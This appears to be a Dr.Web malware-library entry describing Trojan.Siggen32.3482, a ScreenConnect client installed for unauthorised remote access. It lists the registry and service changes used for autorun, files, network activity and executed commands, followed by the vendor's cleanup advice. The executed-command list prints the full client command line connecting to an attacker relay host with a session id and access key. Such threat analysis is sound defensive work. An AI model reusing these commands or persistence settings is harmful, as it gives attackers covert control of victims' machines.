Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen32.3482

Добавлен в вирусную базу Dr.Web: 2025-10-27

Описание добавлено:

Technical Information

To ensure autorun and distribution
Modifies the following registry keys
  • [HKLM\SOFTWARE\Classes\sc-ae2fbebc72d56380\shell\open\command] '' = '"%ProgramFiles(x86)%\ScreenConnect Client (ae2fbebc72d56380)\ScreenConnect.WindowsClient.exe" "%1"'
Sets the following service settings
  • [HKLM\SYSTEM\CurrentControlSet\Services\ScreenConnect Client (ae2fbebc72d56380)] 'Start' = '00000002'
  • [HKLM\SYSTEM\CurrentControlSet\Services\ScreenConnect Client (ae2fbebc72d56380)] 'ImagePath' = '"%ProgramFiles(x86)%\ScreenConnect Client (ae2fbebc72d56380)\ScreenConnect.ClientService.exe" "?e...
Creates the following services
  • 'ScreenConnect Client (ae2fbebc72d56380)' %ProgramFiles(x86)%\ScreenConnect Client (ae2fbebc72d56380)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=manicphotography.com&p=8041&s=777a9df1-bcf4-47cd-9b91-f940045eef3f&k=BgIAAACkAA...
Modifies file system
Creates the following files
  • %TEMP%\setup.msi
  • %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\<File name>.exe.log
  • %TEMP%\msif78c.tmp
  • %TEMP%\msif78c.tmp-\screenconnect.installeractions.dll
  • %TEMP%\msif78c.tmp-\microsoft.deployment.windowsinstaller.dll
  • %TEMP%\msif78c.tmp-\screenconnect.core.dll
  • %TEMP%\msif78c.tmp-\customaction.config
  • %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\rundll32.exe.log
  • %WINDIR%\temp\~dfe48632ad289a9aea.tmp
  • %WINDIR%\installer\sourcehash{eb53ee49-2ff6-4203-a70c-20b67a30fcd7}
  • %WINDIR%\temp\~df666743aa4fed7cbf.tmp
  • %WINDIR%\temp\~df2c5dba9c1b0941f6.tmp
  • %WINDIR%\temp\~df9e115897757e635b.tmp
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.client.dll
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.clientservice.dll
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.core.dll
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.windows.dll
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.windowsclient.exe
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.windowsclient.exe.config
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.clientservice.exe
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\app.config
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\client.en-us.resources
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\client.override.en-us.resources
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\client.override.resources
  • %ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\client.resources
  • %WINDIR%\installer\{eb53ee49-2ff6-4203-a70c-20b67a30fcd7}\defaulticon
  • %WINDIR%\temp\~df2fa1de73b88d188e.tmp
  • %WINDIR%\temp\~df1cb286fc012f548e.tmp
  • %WINDIR%\temp\~df17ffa1f0ee9615bc.tmp
  • %WINDIR%\temp\~dfadf0978f178aad65.tmp
  • %WINDIR%\temp\~df2309cfe3d435fb3e.tmp
  • %WINDIR%\temp\~df0ffdba77cdf30b21.tmp
  • %WINDIR%\temp\~df6382e0b53b73c335.tmp
  • %WINDIR%\temp\~df9521f7ca6fccfaa7.tmp
  • %TEMP%\content\2360-5024-screenconnect.windowsclient.exe-14-08-34-815.dump
Deletes following files that it created itself
  • %TEMP%\msif78c.tmp-\customaction.config
  • %TEMP%\msif78c.tmp-\microsoft.deployment.windowsinstaller.dll
  • %TEMP%\msif78c.tmp-\screenconnect.core.dll
  • %TEMP%\msif78c.tmp-\screenconnect.installeractions.dll
  • %TEMP%\msif78c.tmp
Network activity
Connects to
  • 'ma#####otography.com':8041
TCP
Other
  • 'ma#####otography.com':8041
UDP
  • DNS ASK ma#####otography.com
Miscellaneous
Creates and executes the following
  • '%ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.clientservice.exe' "?e=Access&y=Guest&h=manicphotography.com&p=8041&s=777a9df1-bcf4-47cd-9b91-f940045eef3f&k=BgIAAACkAABSU0ExAAgAAAEAAQARJQaezk4RwOV2NGnVourc54nJ50w31jOUo6bdgji5L2%2bopu%2bBr%2fCMtq2bMHqAikk7DOmGt...
  • '%ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.windowsclient.exe' "RunRole" "a3f38856-684f-4e33-a680-466fd6fd791d" "User"
  • '%ProgramFiles(x86)%\screenconnect client (ae2fbebc72d56380)\screenconnect.windowsclient.exe' "RunRole" "510642ac-23bb-4b4f-87bf-35c9a5f01308" "System"
Executes the following
  • '%WINDIR%\syswow64\msiexec.exe' /i "%TEMP%\setup.msi"
  • '%WINDIR%\syswow64\rundll32.exe' "%TEMP%\MSIF78C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_1178984 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке